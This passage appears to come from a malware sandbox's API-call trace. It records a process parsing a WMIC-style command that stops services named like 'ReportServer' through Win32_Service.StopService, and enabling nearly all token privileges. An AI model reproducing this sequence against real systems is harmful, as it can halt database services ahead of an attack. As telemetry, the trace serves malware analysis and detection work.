lstrlenW (lpString="/") returned 1 [0280.339] lstrlenW (lpString="name like '%%ReportServer%%'") returned 28 [0280.339] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%ReportServer%%'", cchCount1=28, lpString2="/", cchCount2=1) returned 3 [0280.339] lstrlenW (lpString="-") returned 1 [0280.339] lstrlenW (lpString="name like '%%ReportServer%%'") returned 28 [0280.339] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%ReportServer%%'", cchCount1=28, lpString2="-", cchCount2=1) returned 3 [0280.339] lstrlenW (lpString="name like '%%ReportServer%%'") returned 28 [0280.339] malloc (_Size=0x3a) returned 0x320b250 [0280.339] lstrlenW (lpString="name like '%%ReportServer%%'") returned 28 [0280.339] lstrlenW (lpString="/") returned 1 [0280.339] lstrlenW (lpString="call") returned 4 [0280.339] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0280.339] lstrlenW (lpString="-") returned 1 [0280.339] lstrlenW (lpString="call") returned 4 [0280.339] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0280.339] lstrlenW (lpString="call") returned 4 [0280.339] malloc (_Size=0xa) returned 0x320ab10 [0280.339] lstrlenW (lpString="call") returned 4 [0280.339] lstrlenW (lpString="GET") returned 3 [0280.340] lstrlenW (lpString="call") returned 4 [0280.340] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0280.340] lstrlenW (lpString="LIST") returned 4 [0280.340] lstrlenW (lpString="call") returned 4 [0280.340] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0280.340] lstrlenW (lpString="SET") returned 3 [0280.340] lstrlenW (lpString="call") returned 4 [0280.340] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0280.340] lstrlenW (lpString="CREATE") returned 6 [0280.340] lstrlenW (lpString="call") returned 4 [0280.340] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0280.340] lstrlenW (lpString="CALL") returned 4 [0280.340] lstrlenW (lpString="call") returned 4 [0280.340] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0280.340] lstrlenW (lpString="/") returned 1 [0280.340] lstrlenW (lpString="stopservice") returned 11 [0280.340] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0280.340] lstrlenW (lpString="-") returned 1 [0280.340] lstrlenW (lpString="stopservice") returned 11 [0280.340] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0280.340] lstrlenW (lpString="stopservice") returned 11 [0280.340] malloc (_Size=0x18) returned 0x3202be8 [0280.340] lstrlenW (lpString="stopservice") returned 11 [0280.340] ??0CHString@@QAE@XZ () returned 0x9cd814 [0280.340] GetCurrentThreadId () returned 0x1114 [0280.341] GetCurrentThreadId () returned 0x1114 [0280.341] ??0CHString@@QAE@XZ () returned 0x9cd79c [0280.341] malloc (_Size=0x4) returned 0x320b1e8 [0280.341] malloc (_Size=0xc) returned 0x320ac00 [0280.341] malloc (_Size=0xc) returned 0x320ae10 [0280.341] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2ff4980, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68518 | out: ppNamespace=0xa68518*=0x2ffaa68) returned 0x0 [0280.398] free (_Block=0x320ae10) [0280.398] CoSetProxyBlanket (pProxy=0x2ffaa68, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0280.399] free (_Block=0x320b1e8) [0280.399] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0280.399] free (_Block=0x320ac00) [0280.399] malloc (_Size=0xc) returned 0x320ac00 [0280.399] IWbemServices:GetObject (in: This=0x2ffaa68, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x9cd82c*=0x0, ppCallResult=0x0 | out: ppObject=0x9cd82c*=0x3050488, ppCallResult=0x0) returned 0x0 [0280.480] free (_Block=0x320ac00) [0280.480] IWbemClassObject:BeginMethodEnumeration (This=0x3050488, lEnumFlags=0) returned 0x0 [0280.480] IWbemClassObject:NextMethod (in: This=0x3050488, lFlags=0, pstrName=0x9cd838*=0x0, ppInSignature=0x9cd834*=0x0, ppOutSignature=0x9cd830*=0x0 | out: pstrName=0x9cd838*="StartService", ppInSignature=0x9cd834*=0x0, ppOutSignature=0x9cd830*=0x3050680) returned 0x0 [0280.480] lstrlenW (lpString="StartService") returned 12 [0280.480] lstrlenW (lpString="stopservice") returned 11 [0280.480] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0280.480] IUnknown:Release (This=0x3050680) returned 0x0 [0280.480] IWbemClassObject:NextMethod (in: This=0x3050488, lFlags=0, pstrName=0x9cd838*=0x0, ppInSignature=0x9cd834*=0x0, ppOutSignature=0x9cd830*=0x0 | out: pstrName=0x9cd838*="StopService", ppInSignature=0x9cd834*=0x0, ppOutSignature=0x9cd830*=0x3050680) returned 0x0 [0280.481] lstrlenW (lpString="StopService") returned 11 [0280.481] lstrlenW (lpString="stopservice") returned 11 [0280.481] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0280.481] malloc (_Size=0x38) returned 0x320ba08 [0280.481] ??0CHString@@QAE@XZ () returned 0x9cd37c [0280.481] GetCurrentThreadId () returned 0x1114 [0280.481] IWbemClassObject:GetNames (in: This=0x3050680, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x9cd38c | out: pNames=0x9cd38c*="\x01ƀ\x04") returned 0x0 [0280.482] SafeArrayGetLBound (in: psa=0x3050c78, nDim=0x1, plLbound=0x9cd378 | out: plLbound=0x9cd378) returned 0x0 [0280.482] SafeArrayGetUBound (in: psa=0x3050c78, nDim=0x1, plUbound=0x9cd374 | out: plUbound=0x9cd374) returned 0x0 [0280.482] SafeArrayGetElement (in: psa=0x3050c78, rgIndices=0x9cd380, pv=0x9cd390 | out: pv=0x9cd390) returned 0x0 [0280.482] malloc (_Size=0x24) returned 0x320ba48 [0280.482] IWbemClassObject:GetPropertyQualifierSet (in: This=0x3050680, wszProperty="ReturnValue", ppQualSet=0x9cd2a0 | out: ppQualSet=0x9cd2a0*=0x2ffac58) returned 0x0 [0280.483] malloc (_Size=0xc) returned 0x320ac00 [0280.483] IWbemQualifierSet:Get (in: This=0x2ffac58, wszName="CIMTYPE", lFlags=0, pVal=0x9cd270*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x9cd270*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x0), plFlavor=0x0) returned 0x0 [0280.483] free (_Block=0x320ac00) [0280.483] malloc (_Size=0xc) returned 0x320ac00 [0280.484] IWbemClassObject:Get (in: This=0x3050680, wszName="ReturnValue", lFlags=0, pVal=0x9cd248*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x9cd284*=10277484, plFlavor=0x0 | out: pVal=0x9cd248*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x9cd284*=19, plFlavor=0x0) returned 0x0 [0280.484] malloc (_Size=0xc) returned 0x320aed0 [0280.484] IWbemQualifierSet:Get (in: This=0x2ffac58, wszName="read", lFlags=0, pVal=0x9cd288*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x9cd288*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0280.484] free (_Block=0x320aed0) [0280.484] malloc (_Size=0xc) returned 0x320ae40 [0280.484] IWbemQualifierSet:Get (in: This=0x2ffac58, wszName="write", lFlags=0, pVal=0x9cd288*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x9cd288*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0280.484] free (_Block=0x320ae40) [0280.484] malloc (_Size=0xc) returned 0x320ae70 [0280.484] malloc (_Size=0xc) returned 0x320ae10 [0280.484] IWbemQualifierSet:Get (in: This=0x2ffac58, wszName="Description", lFlags=0, pVal=0x9cd260*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x9cd260*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0280.484] free (_Block=0x320ae10) [0280.484] malloc (_Size=0xc) returned 0x320aed0 [0280.484] lstrlenA (lpString="Not Available") returned 13 [0280.484] malloc (_Size=0x1c) returned 0x320ba78 [0280.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa21d94, cbMultiByte=-1, lpWideCharStr=0x320ba78, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0280.485] free (_Block=0x320ba78) [0280.485] IUnknown:Release (This=0x2ffac58) returned 0x0 [0280.485] malloc (_Size=0x24) returned 0x320ba78 [0280.485] malloc (_Size=0xc) returned 0x320aea0 [0280.485] malloc (_Size=0x24) returned 0x320baa8 [0280.485] malloc (_Size=0x38) returned 0x320bad8 [0280.485] malloc (_Size=0x24) returned 0x320bb18 [0280.485] free (_Block=0x320baa8) [0280.485] free (_Block=0x320ba78) [0280.485] free (_Block=0x320ba48) [0280.485] free (_Block=0x320ae70) [0280.485] free (_Block=0x320aed0) [0280.485] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0280.485] IWbemClassObject:GetMethodQualifierSet (in: This=0x3050488, wszMethod="StopService", ppQualSet=0x9cd794 | out: ppQualSet=0x9cd794*=0x3024110) returned 0x0 [0280.486] malloc (_Size=0xc) returned 0x320ae70 [0280.486] IWbemQualifierSet:Get (in: This=0x3024110, wszName="Implemented", lFlags=0, pVal=0x9cd77c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x9cd77c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0280.486] free (_Block=0x320ae70) [0280.486] malloc (_Size=0xc) returned 0x320ae28 [0280.486] malloc (_Size=0xc) returned 0x320ae40 [0280.486] IWbemQualifierSet:Get (in: This=0x3024110, wszName="Description", lFlags=0, pVal=0x9cd76c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x9cd76c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x0), plFlavor=0x0) returned 0x0 [0280.486] free (_Block=0x320ae40) [0280.486] malloc (_Size=0xc) returned 0x320ae10 [0280.487] IUnknown:Release (This=0x3024110) returned 0x0 [0280.487] malloc (_Size=0x38) returned 0x320ba48 [0280.487] malloc (_Size=0x38) returned 0x320ba88 [0280.487] malloc (_Size=0x24) returned 0x320bb48 [0280.487] malloc (_Size=0xc) returned 0x320ae88 [0280.487] malloc (_Size=0x38) returned 0x320bb78 [0280.487] malloc (_Size=0x38) returned 0x320bbb8 [0280.487] malloc (_Size=0x24) returned 0x320bbf8 [0280.487] malloc (_Size=0x28) returned 0x320bc28 [0280.487] malloc (_Size=0x38) returned 0x320bc58 [0280.487] malloc (_Size=0x38) returned 0x320bc98 [0280.487] malloc (_Size=0x24) returned 0x320bcd8 [0280.487] free (_Block=0x320bbf8) [0280.487] free (_Block=0x320bbb8) [0280.487] free (_Block=0x320bb78) [0280.487] free (_Block=0x320bb48) [0280.487] free (_Block=0x320ba88) [0280.487] free (_Block=0x320ba48) [0280.487] IUnknown:Release (This=0x3050680) returned 0x0 [0280.487] free (_Block=0x320bb18) [0280.487] free (_Block=0x320bad8) [0280.487] free (_Block=0x320ba08) [0280.488] IWbemClassObject:NextMethod (in: This=0x3050488, lFlags=0, pstrName=0x9cd838*=0x0, ppInSignature=0x9cd834*=0x0, ppOutSignature=0x9cd830*=0x0 | out: pstrName=0x9cd838*="PauseService", ppInSignature=0x9cd834*=0x0, ppOutSignature=0x9cd830*=0x3026c68) returned 0x0 [0280.488] lstrlenW (lpString="PauseService") returned 12 [0280.488] lstrlenW (lpString="stopservice") returned 11 [0280.488] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0280.488] IUnknown:Release (This=0x3026c68) returned 0x0 [0280.488] IWbemClassObject:NextMethod (in: This=0x3050488, lFlags=0, pstrName=0x9cd838*=0x0, ppInSignature=0x9cd834*=0x0, ppOutSignature=0x9cd830*=0x0 | out: pstrName=0x9cd838*="ResumeService", ppInSignature=0x9cd834*=0x0, ppOutSignature=0x9cd830*=0x3026c68) returned 0x0 [0280.488] lstrlenW (lpString="ResumeService") returned 13 [0280.488] lstrlenW (lpString="stopservice") returned 11 [0280.488] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0280.488] IUnknown:Release (This=0x3026c68) returned 0x0 [0280.488] IWbemClassObject:NextMethod (in: This=0x3050488, lFlags=0, pstrName=0x9cd838*=0x0, ppInSignature=0x9cd834*=0x0, ppOutSignature=0x9cd830*=0x0 | out: pstrName=0x9cd838*="InterrogateService", ppInSignature=0x9cd834*=0x0, ppOutSignature=0x9cd830*=0x3026c68) returned 0x0 [0280.488] lstrlenW (lpString="InterrogateService") returned 18 [0280.489] lstrlenW (lpString="stopservice") returned 11 [0280.489] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0280.489] IUnknown:Release (This=0x3026c68) returned 0x0 [0280.489] IWbemClassObject:NextMethod (in: This=0x3050488, lFlags=0, pstrName=0x9cd838*=0x0, ppInSignature=0x9cd834*=0x0, ppOutSignature=0x9cd830*=0x0 | out: pstrName=0x9cd838*="UserControlService", ppInSignature=0x9cd834*=0x3050680, ppOutSignature=0x9cd830*=0x3053138) returned 0x0 [0280.489] lstrlenW (lpString="UserControlService") returned 18 [0280.489] lstrlenW (lpString="stopservice") returned 11 [0280.489] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0280.490] IUnknown:Release (This=0x3050680) returned 0x0 [0280.490] IUnknown:Release (This=0x3053138) returned 0x0 [0280.490] IWbemClassObject:NextMethod (in: This=0x3050488, lFlags=0, pstrName=0x9cd838*=0x0, ppInSignature=0x9cd834*=0x0, ppOutSignature=0x9cd830*=0x0 | out: pstrName=0x9cd838*="Create", ppInSignature=0x9cd834*=0x3050680, ppOutSignature=0x9cd830*=0x3055108) returned 0x0 [0280.490] lstrlenW (lpString="Create") returned 6 [0280.490] lstrlenW (lpString="stopservice") returned 11 [0280.490] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0280.491] IUnknown:Release (This=0x3050680) returned 0x0 [0280.491] IUnknown:Release (This=0x3055108) returned 0x0 [0280.491] IWbemClassObject:NextMethod (in: This=0x3050488, lFlags=0, pstrName=0x9cd838*=0x0, ppInSignature=0x9cd834*=0x0, ppOutSignature=0x9cd830*=0x0 | out: pstrName=0x9cd838*="Change", ppInSignature=0x9cd834*=0x3050680, ppOutSignature=0x9cd830*=0x3054e88) returned 0x0 [0280.491] lstrlenW (lpString="Change") returned 6 [0280.491] lstrlenW (lpString="stopservice") returned 11 [0280.491] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0280.491] IUnknown:Release (This=0x3050680) returned 0x0 [0280.491] IUnknown:Release (This=0x3054e88) returned 0x0 [0280.491] IWbemClassObject:NextMethod (in: This=0x3050488, lFlags=0, pstrName=0x9cd838*=0x0, ppInSignature=0x9cd834*=0x0, ppOutSignature=0x9cd830*=0x0 | out: pstrName=0x9cd838*="ChangeStartMode", ppInSignature=0x9cd834*=0x3050680, ppOutSignature=0x9cd830*=0x3053138) returned 0x0 [0280.491] lstrlenW (lpString="ChangeStartMode") returned 15 [0280.491] lstrlenW (lpString="stopservice") returned 11 [0280.491] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0280.492] IUnknown:Release (This=0x3050680) returned 0x0 [0280.492] IUnknown:Release (This=0x3053138) returned 0x0 [0280.492] IWbemClassObject:NextMethod (in: This=0x3050488, lFlags=0, pstrName=0x9cd838*=0x0, ppInSignature=0x9cd834*=0x0, ppOutSignature=0x9cd830*=0x0 | out: pstrName=0x9cd838*="Delete", ppInSignature=0x9cd834*=0x0, ppOutSignature=0x9cd830*=0x3026c68) returned 0x0 [0280.492] lstrlenW (lpString="Delete") returned 6 [0280.492] lstrlenW (lpString="stopservice") returned 11 [0280.492] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0280.492] IUnknown:Release (This=0x3026c68) returned 0x0 [0280.492] IWbemClassObject:NextMethod (in: This=0x3050488, lFlags=0, pstrName=0x9cd838*=0x0, ppInSignature=0x9cd834*=0x0, ppOutSignature=0x9cd830*=0x0 | out: pstrName=0x9cd838*="GetSecurityDescriptor", ppInSignature=0x9cd834*=0x0, ppOutSignature=0x9cd830*=0x3050680) returned 0x0 [0280.492] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0280.492] lstrlenW (lpString="stopservice") returned 11 [0280.492] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0280.492] IUnknown:Release (This=0x3050680) returned 0x0 [0280.492] IWbemClassObject:NextMethod (in: This=0x3050488, lFlags=0, pstrName=0x9cd838*=0x0, ppInSignature=0x9cd834*=0x0, ppOutSignature=0x9cd830*=0x0 | out: pstrName=0x9cd838*="SetSecurityDescriptor", ppInSignature=0x9cd834*=0x3050680, ppOutSignature=0x9cd830*=0x3053138) returned 0x0 [0280.492] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0280.492] lstrlenW (lpString="stopservice") returned 11 [0280.493] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0280.493] IUnknown:Release (This=0x3050680) returned 0x0 [0280.493] IUnknown:Release (This=0x3053138) returned 0x0 [0280.493] IWbemClassObject:NextMethod (in: This=0x3050488, lFlags=0, pstrName=0x9cd838*=0x0, ppInSignature=0x9cd834*=0x0, ppOutSignature=0x9cd830*=0x0 | out: pstrName=0x9cd838*=0x0, ppInSignature=0x9cd834*=0x0, ppOutSignature=0x9cd830*=0x0) returned 0x40005 [0280.493] IUnknown:Release (This=0x3050488) returned 0x0 [0280.494] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0280.494] lstrlenW (lpString="SET") returned 3 [0280.494] lstrlenW (lpString="call") returned 4 [0280.494] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0280.494] lstrlenW (lpString="CREATE") returned 6 [0280.494] lstrlenW (lpString="call") returned 4 [0280.494] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0280.494] free (_Block=0x3202bc8) [0280.494] malloc (_Size=0x4) returned 0x320b1e8 [0280.494] lstrlenW (lpString="GET") returned 3 [0280.494] lstrlenW (lpString="call") returned 4 [0280.494] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0280.494] lstrlenW (lpString="LIST") returned 4 [0280.494] lstrlenW (lpString="call") returned 4 [0280.495] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0280.495] lstrlenW (lpString="ASSOC") returned 5 [0280.495] lstrlenW (lpString="call") returned 4 [0280.495] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0280.495] WbemLocator:IUnknown:AddRef (This=0x2ff4980) returned 0x3 [0280.495] free (_Block=0x3201208) [0280.495] lstrlenW (lpString="") returned 0 [0280.495] lstrlenW (lpString="NQDPDE") returned 6 [0280.495] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0280.495] lstrlenW (lpString="NQDPDE") returned 6 [0280.495] malloc (_Size=0xe) returned 0x320aed0 [0280.495] lstrlenW (lpString="NQDPDE") returned 6 [0280.495] GetCurrentThreadId () returned 0x1114 [0280.495] GetCurrentProcess () returned 0xffffffff [0280.495] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x9cf914 | out: TokenHandle=0x9cf914*=0x2f8) returned 1 [0280.495] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x9cf910 | out: TokenInformation=0x0, ReturnLength=0x9cf910) returned 0 [0280.495] malloc (_Size=0x118) returned 0x320ba08 [0280.495] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x320ba08, TokenInformationLength=0x118, ReturnLength=0x9cf910 | out: TokenInformation=0x320ba08, ReturnLength=0x9cf910) returned 1 [0280.495] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x320ba08*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0280.495] free (_Block=0x320ba08) [0280.495] CloseHandle (hObject=0x2f8) returned 1 [0280.495] lstrlenW (lpString="GET") returned 3 [0280.495] lstrlenW (lpString="call") returned 4 [0280.495] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0280.495] lstrlenW (lpString="LIST") returned 4 [0280.495] lstrlenW (lpString="call") returned 4 [0280.496] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0280.496] lstrlenW (lpString="SET") returned 3 [0280.496] lstrlenW (lpString="call") returned 4 [0280.496] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0280.496] lstrlenW (lpString="CALL") returned 4 [0280.496] lstrlenW (lpString="call") returned 4 [0280.496] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0280.496] ??0CHString@@QAE@XZ () returned 0x9cf8d4 [0280.496] GetCurrentThreadId () returned 0x1114 [0280.496] malloc (_Size=0xc) returned 0x320ae40 [0280.496] malloc (_Size=0xc) returned 0x320ae58 [0280.496] malloc (_Size=0xc) returned 0x320aeb8 [0280.496] malloc (_Size=0xc) returned 0x320ae70 [0280.496] malloc (_Size=0xc) returned 0x3209838 [0280.496] SysStringLen (param_1="\\\\") returned 0x2 [0280.496] SysStringLen (param_1="NQDPDE") returned 0x6 [0280.496] malloc (_Size=0xc) returned 0x320c068 [0280.497] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0280.497] SysStringLen (param_1="\\") returned 0x1 [0280.497] malloc (_Size=0xc) returned 0x320c038 [0280.497] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0280.497] SysStringLen (param_1="root\\cimv2") returned 0xa [0280.497] free (_Block=0x320c068) [0280.497] free (_Block=0x3209838) [0280.497] free (_Block=0x320ae70) [0280.497] free (_Block=0x320aeb8) [0280.497] free (_Block=0x320ae58) [0280.497] free (_Block=0x320ae40) [0280.497] malloc (_Size=0xc) returned 0x320c0f8 [0280.497] malloc (_Size=0xc) returned 0x320c050 [0280.497] malloc (_Size=0xc) returned 0x320c0b0 [0280.497] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2ff4980, strNetworkResource="\\\\NQDPDE\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68564 | out: ppNamespace=0xa68564*=0x3050e30) returned 0x0 [0280.509] free (_Block=0x320c0b0) [0280.509] free (_Block=0x320c050) [0280.509] free (_Block=0x320c0f8) [0280.509] CoSetProxyBlanket (pProxy=0x3050e30, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0280.509] free (_Block=0x320c038) [0280.509] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0280.509] ??0CHString@@QAE@XZ () returned 0x9cf8cc [0280.509] GetCurrentThreadId () returned 0x1114 [0280.509] malloc (_Size=0x38) returned 0x320ba08 [0280.509] malloc (_Size=0x28) returned 0x320ba48 [0280.509] malloc (_Size=0x28) returned 0x320ba78 [0280.509] malloc (_Size=0x38) returned 0x320baa8 [0280.509] malloc (_Size=0x38) returned 0x320bae8 [0280.509] malloc (_Size=0x24) returned 0x320bb28 [0280.509] malloc (_Size=0xc) 